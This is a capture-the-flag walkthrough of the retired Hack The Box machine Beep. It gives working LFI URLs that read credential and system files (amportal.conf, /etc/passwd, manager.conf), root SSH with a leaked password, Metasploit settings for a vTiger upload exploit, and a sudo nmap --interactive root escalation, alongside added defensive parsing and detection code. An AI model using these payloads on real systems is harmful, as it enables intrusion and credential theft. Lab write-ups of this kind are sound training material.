Keep Calm and Hack The Box - Beep

Hack The Box (HTB) is an online platform that lets you test your penetration testing skills. It contains several challenges that are constantly updated; some of them simulate real-world scenarios and some lean more towards a CTF style of challenge.

Note. Only write-ups of retired HTB machines are allowed.

Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some as there are many potential attack vectors.

We will use the following tools to pwn the box from a Kali Linux box.

Step 1 - Scanning the network

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to get a basic idea of what we are scanning

nmap -sV -O -F --version-light 10.10.10.7

-sV: Probe open ports to determine service/version info

-O: Enable OS detection

-F: Fast mode - Scan fewer ports than the default scan

--version-light: Limit to most likely probes (intensity 2)

10.10.10.7: IP address of the Beep box

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

I use a different set of commands to perform an intensive scan

nmap -A -v 10.10.10.7

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

10.10.10.7: IP address of the Beep box

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

We can see that there are 12 open ports:

Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3

Port 110. Post Office Protocol, version 3 (POP3)

Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)

Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server

Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)

Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)

Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)

Port 3306. MySQL database system

Port 4445. I2P HTTP/S proxy

Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port)

Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.
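
To work with the scan results outside the Zenmap GUI, here is an added Python example (not part of the original write-up) that parses nmap's grepable output (the -oG format), pulls out the open ports, and then answers two defender-side questions: which remote administration or database interfaces are reachable, and which cleartext mail services are still listening although their TLS counterpart is up. The scan text is a constructed sample built from the twelve ports listed above; the version strings other than Apache httpd 2.2.3, the scanner version in the banner line, and the admin-port labels are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap's grepable (-oG) output for the Beep scan.
# The port numbers and service names are the twelve listed in the write-up;
# every version string except "Apache httpd 2.2.3" is left empty because the
# write-up does not give them (the 10000/tcp label is a constructed value).
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated as: nmap -sV -oG - 10.10.10.7
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh///, 25/open/tcp//smtp///, 80/open/tcp//http//Apache httpd 2.2.3/, 110/open/tcp//pop3///, 111/open/tcp//rpcbind///, 143/open/tcp//imap///, 443/open/tcp//ssl|http//Apache httpd 2.2.3/, 993/open/tcp//ssl|imap///, 995/open/tcp//ssl|pop3///, 3306/open/tcp//mysql///, 4445/open/tcp//upnotifyp///, 10000/open/tcp//http//Webmin httpd/\tIgnored State: closed (88)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# One grepable port entry: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_grepable(text):
    """Map each scanned host to the list of Service entries nmap reported."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue                      # banner or comment line
        fields = line.split("\t")         # -oG separates sections with tabs
        host = fields[0].split()[1]
        services = hosts.setdefault(host, [])
        for section in fields[1:]:
            if section.startswith("Ports: "):
                for m in PORT_RE.finditer(section[len("Ports: "):]):
                    port, state, proto, _owner, name, _rpc, version = m.groups()
                    services.append(Service(int(port), proto, state, name, version))
    return hosts


def open_ports(services):
    return sorted(s.port for s in services if s.state == "open")


# Interfaces a defender reviews first on an internet-facing host: remote
# administration and the database. This port-to-label map is an assumption
# for the example, based on the services the write-up identifies.
ADMIN_PORTS = {22: "ssh", 3306: "mysql", 10000: "webmin"}


def exposed_admin_interfaces(services):
    return {s.port: ADMIN_PORTS[s.port]
            for s in services if s.state == "open" and s.port in ADMIN_PORTS}


def cleartext_with_tls_twin(services):
    """Cleartext mail ports still listening although their TLS variant is
    also up, so a misconfigured client can send credentials unencrypted."""
    pairs = {110: 995, 143: 993}          # pop3 -> pop3s, imap -> imaps
    listening = set(open_ports(services))
    return sorted(p for p, tls in pairs.items() if p in listening and tls in listening)


if __name__ == "__main__":
    svcs = parse_grepable(SAMPLE_GREPABLE)["10.10.10.7"]
    for s in svcs:
        print(f"{s.port:>5}/{s.proto} {s.state:<6} {s.name:<10} {s.version}")
    print("admin interfaces:", exposed_admin_interfaces(svcs))
    print("cleartext mail with TLS twin:", cleartext_with_tls_twin(svcs))
```

Run the scan with `nmap -sV -oG beep.gnmap 10.10.10.7` and feed the file's contents to `parse_grepable`. The two defender-side lists are what you would carry into a hardening review: Webmin and MySQL reachable from the network are rarely intended, and POP3/IMAP without TLS should normally be switched off once the TLS ports exist.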

Step 2 - Enumerating the directories

Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.

You can launch DirBuster by typing this command on the terminal

dirbuster

or by searching the application

The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button.

I use the directory-list-2.3-medium.txt for this search

DirBuster finds a huge list of directories with several content management systems and open source applications. Amongst the results there are several vulnerabilities that can lead to a shell.

Step 3 - Visiting the website

Let's try port 80 and visit http://10.10.10.7

The website redirects to https://10.10.10.7 and we need to add a security exception in the browser to continue.

We finally land on the website, which is an Elastix login portal. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as call center software with predictive dialling.

An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business

If you want to learn more about Elastix, you can have a look here

I try the default credentials, but they don't seem to work

Username: admin
Password: palosanto

Having a look at the source code doesn't help either

I will use Searchsploit to check if there's any known vulnerability on Elastix. Searchsploit is a command line search tool for Exploit Database

I use the following command

searchsploit elastix

We can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command

searchsploit -x 37637.pl

We have a summary of the exploit and the code

The LFI Exploit is the following

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).
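
Since this LFI is the entry point for the box, here is an added Python example (not vTiger's PHP and not part of the original write-up) that reproduces the bug class in a toy path resolver, shows the allowlist-based fix beside it, and runs a small detector over constructed Apache access-log lines carrying the two request paths this write-up uses. The document root, the language allowlist, the client addresses and the log lines are all assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root and language directory for the demo; vTiger's
# real layout is not reproduced here.
WEB_ROOT = "/var/www/html/vtigercrm"
LANG_DIR = posixpath.join(WEB_ROOT, "include", "language")


def resolve_language_file_vulnerable(current_language):
    """Bug class behind the graph.php finding: the request parameter is
    concatenated into a file path with no validation. The %00 in the exploit
    URL is a NUL byte; PHP releases before 5.3.4 truncated the path at NUL,
    which discards the '.lang.php' suffix the application appended."""
    raw = unquote(current_language)
    path = f"{LANG_DIR}/{raw}.lang.php"
    path = path.split("\x00", 1)[0]       # emulate the NUL-byte truncation
    return posixpath.normpath(path)       # ../ segments walk out of LANG_DIR


# Constructed allowlist of language codes the application is meant to serve.
ALLOWED_LANGUAGES = {"en_us", "es_es", "de_de"}


def resolve_language_file_hardened(current_language):
    """Only a known language code is accepted, so traversal sequences, NUL
    bytes and absolute paths never reach the filesystem; the containment check
    is defence in depth in case the allowlist is ever widened."""
    raw = unquote(current_language)
    if raw not in ALLOWED_LANGUAGES:
        raise ValueError(f"unsupported language: {raw!r}")
    path = posixpath.normpath(posixpath.join(LANG_DIR, raw + ".lang.php"))
    if posixpath.commonpath([path, LANG_DIR]) != LANG_DIR:
        raise ValueError("resolved path escapes the language directory")
    return path


# Request-path markers of traversal or NUL injection, plus the system files
# the write-up shows being read through the two LFI bugs.
LFI_MARKERS = re.compile(
    r"(\.\./|\.\.%2f|%2e%2e[/%]|%00|/etc/(passwd|shadow|amportal\.conf|asterisk/))",
    re.IGNORECASE,
)
# Common Log Format: client, ident, user, [time], "METHOD path HTTP/x.y", status
ACCESS_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/\d\.\d" (\d{3})')

# Constructed Apache access-log lines; 192.0.2.10 and 198.51.100.5 are
# documentation addresses, not hosts from the write-up.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [10/Oct/2020:12:00:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Oct/2020:12:00:07 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 3071',
    '192.0.2.10 - - [10/Oct/2020:12:00:09 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1450',
    '198.51.100.5 - - [10/Oct/2020:12:01:00 +0000] "GET /index.php HTTP/1.1" 302 -',
]


def flag_lfi_requests(log_lines):
    """Return (client, path, status) for requests carrying LFI markers."""
    hits = []
    for line in log_lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        client, path, status = m.groups()
        if LFI_MARKERS.search(path):
            hits.append((client, path, int(status)))
    return hits


if __name__ == "__main__":
    payload = "../../../../../../../..//etc/amportal.conf%00"
    print("vulnerable resolves to:", resolve_language_file_vulnerable(payload))
    try:
        resolve_language_file_hardened(payload)
    except ValueError as exc:
        print("hardened rejects:", exc)
    for client, path, status in flag_lfi_requests(SAMPLE_ACCESS_LOG):
        print(f"ALERT {client} {status} {path}")
```

The detector flags traversal markers regardless of response code, but the lines that deserve an alert are those that returned 200, because that is the sign the include succeeded; the two constructed hits are exactly the two paths this write-up uses.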

You can also check the Exploit Database to find the exploit

You will get the same results as on the terminal. If you navigate to the 2.0 - 'graph.php' Local File Inclusion, you will have a description of the exploit

If you remember from step 2, the directory enumeration flagged a vTiger CRM.

vTiger CRM is an integrated customer relationship management (CRM) application that can be used on the Intranet or from the Internet using a browser. It is distributed under a free license

If you want to learn more about vTiger CRM, you can have a look here

You can also read more about the integration between Elastix and vTigerCRM here

Step 4 - Trying the Elastix LFI exploit

Let's navigate to

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

If you can't read anything, you can prettify the file by viewing the page source

I find a password jEhdIekWmdjE

If you remember from step 1, the nmap scan flagged port 22 as open, so let's try the newly found password on it

Step 5 - Connecting to SSH

Let's connect to the SSH with the following command

ssh root@10.10.10.7

I try the password and I'm in!

Step 6 - Looking for the root.txt flag

I can now look for the first flag, root.txt

I use the following command to check who I am on this machine

whoami

I have root access to the machine. I got the power!

I use the following command to check where I am on the machine

pwd

I'm in /root and by doing

ls

I find the root.txt file! To read the content of the file I use the command

cat root.txt

Now that we have the root flag, let's find the user flag!

Step 7 - Looking for the user.txt flag

I need to navigate back to the home directory by doing

cd home

I then list all the files/folders and see there's a folder called fanis

I navigate to this folder with

cd fanis

And when I list the files/folders, I can see the user.txt file!

To read the content of the file I use the command

cat user.txt

Congrats! You found both flags!



Variations for Informational findings
Step 3b - Visiting the website

Let's navigate to

https://10.10.10.7/vtigercrm/

We can see the version of the application: vTiger CRM 5.1.0

I will use Searchsploit to check if there's any known vulnerability on vTigerCRM

I use the following command

searchsploit vtiger

We can see several vulnerabilities. I examine the Local File Inclusion with this command

searchsploit -x 18770.txt

I have a summary of the exploit and the code

The LFI Exploit is the following

/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

You can also check the exploit database to find the exploit

You will get the same results on the terminal. If you navigate to the vTiger 5.1.0 - Local File Inclusion, you will have a description of the exploit

Step 4b - Doing more recon around the vTiger Asterisk default credentials

Let's navigate to

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

If you can't read anything, you can prettify the file by viewing the page source

I also do some research on default credentials for vTiger and find some documentation around installing vTiger Asterisk Connector

If we modify the previous URL to

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00

I navigate to this page (using source code to prettify the output)

I find a password jEhdIekWmdjE

You can continue to Step 5 from there



Variations using Metasploit, meterpreter, nmap --interactive and Burp
Step 3c - Visiting the website

We know that the version of the application is vTiger CRM 5.1.0

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

I launch Metasploit Framework on Kali and look for the command I should use to launch the exploit

I find an interesting payload, number 3

exploit/multi/http/vtiger_soap_upload

This is the description of the exploit

vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.
I use the following command for the exploit

use exploit/multi/http/vtiger_soap_upload

I need to set up several options before launching the exploit

I start by setting the RHOSTS with the following command

set RHOSTS 10.10.10.7/32

I set the SSL and the RPORT with

set SSL true

and

set RPORT 443

I run the exploit, but I need to set the correct LPORT this time with

set LPORT 10.10.14.10

Here is a summary of all the commands

I check the options

I run the exploit with the command

run

I get this error message

I set up the proxy with the following command

set proxies http:127.0.0.1:8080

I check the options again

I run the exploit but I get a new error message

I set it with this command

set ReverseAllowProxy true

I also need to set up Burp to proxy the exploit.

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications

You can learn more on the official website here

Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > edit

I run the exploit on Metasploit and go back to Burp. I can see Burp intercepted the request

I set the Intercept option to off

Back on Metasploit, I finally get a Meterpreter session

From the Offensive Security website, we get this definition for Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.

Step 4c - Looking for the user.txt flag

I navigate to the root directory to find the home folder. I then move to the home directory with

cd home

You can list files/folders with

ls -la

I find a folder called fanis. Let's see what's inside with

cd fanis

I list all files/folders and I find the user.txt flag. To read the content of the file I use the command

cat user.txt

Now that we have the user flag, let's find the root flag!

Step 5c - Looking for the root.txt flag

I can't access the root folder, but I can create a shell with the command

shell

If I check who I am on the machine, I get

If you do

sudo -l

you can see many NOPASSWD commands which can lead us to getting root

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that can be executed with root privileges via sudo without a password, it is possible to use the interactive console to run a shell with the same privileges.

Let's try it with the following command

sudo nmap --interactive

The following command will give an elevated shell. You can read more on the Bourne shell here

!sh

I check who I am on the machine, and I have root access
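
For the defender's side of this step, here is an added Python example (not part of the original write-up) that parses a sudoers file, lists the NOPASSWD rules, and flags the two cases this write-up documents as handing out a root shell: an unrestricted ALL, and an nmap binary from the 2.02 to 5.21 range that still has --interactive. The sudoers excerpt is constructed to resemble the sudo -l output described above (it is not the box's real file), and the installed nmap version passed to the audit is an assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed /etc/sudoers excerpt resembling what "sudo -l" revealed on the
# box: several NOPASSWD commands for the service account, one of them nmap.
SAMPLE_SUDOERS = """\
Defaults    requiretty
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
asterisk    ALL = NOPASSWD: /sbin/shutdown
asterisk    ALL = NOPASSWD: /usr/bin/nmap
asterisk    ALL = NOPASSWD: /usr/bin/yum
asterisk    ALL = NOPASSWD: /bin/touch, /sbin/service
"""

# user host = (runas) TAG: cmd, cmd   (Defaults and comment lines do not match)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


@dataclass
class Rule:
    user: str
    host: str
    runas: str
    nopasswd: bool
    commands: list = field(default_factory=list)


def parse_sudoers(text):
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").split()
        rules.append(Rule(
            user=m.group("user"),
            host=m.group("host"),
            runas=m.group("runas") or "root",     # sudo's default target user
            nopasswd="NOPASSWD:" in tags,
            commands=[c.strip() for c in m.group("cmds").split(",")],
        ))
    return rules


def nmap_has_interactive(version):
    """Nmap 2.02 through 5.21 shipped --interactive, whose !sh escape spawns
    a shell as the invoking user, which under sudo means root."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:2])
    return (2, 2) <= parts <= (5, 21)


def audit(rules, installed_nmap_version):
    """Findings for NOPASSWD rules that hand out a root shell. The check set
    is deliberately limited to what the write-up documents: unrestricted ALL,
    and nmap with the interactive mode present."""
    findings = []
    for r in rules:
        if not r.nopasswd:
            continue
        for cmd in r.commands:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((r.user, cmd, "any command as root without a password"))
            elif binary == "nmap" and nmap_has_interactive(installed_nmap_version):
                findings.append((r.user, cmd, "nmap --interactive then !sh gives a root shell"))
    return findings


if __name__ == "__main__":
    rules = parse_sudoers(SAMPLE_SUDOERS)
    # "5.00" is a constructed value; take the real one from `nmap --version`.
    for user, cmd, why in audit(rules, installed_nmap_version="5.00"):
        print(f"{user}: {cmd} -> {why}")
```

The fix is to drop the nmap entry (and any other binary with a shell escape) from the NOPASSWD list, or to pin the rule to the exact arguments the service account needs; a sudoers command with no arguments listed permits any arguments, which is what makes --interactive reachable here.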

I can now navigate to the root directory

I find the root.txt.txt file!

To read the content of the file I use the command

cat root.txt

Congrats! You found both flags!



Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!



Other Hack The Box articles

Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-beep/
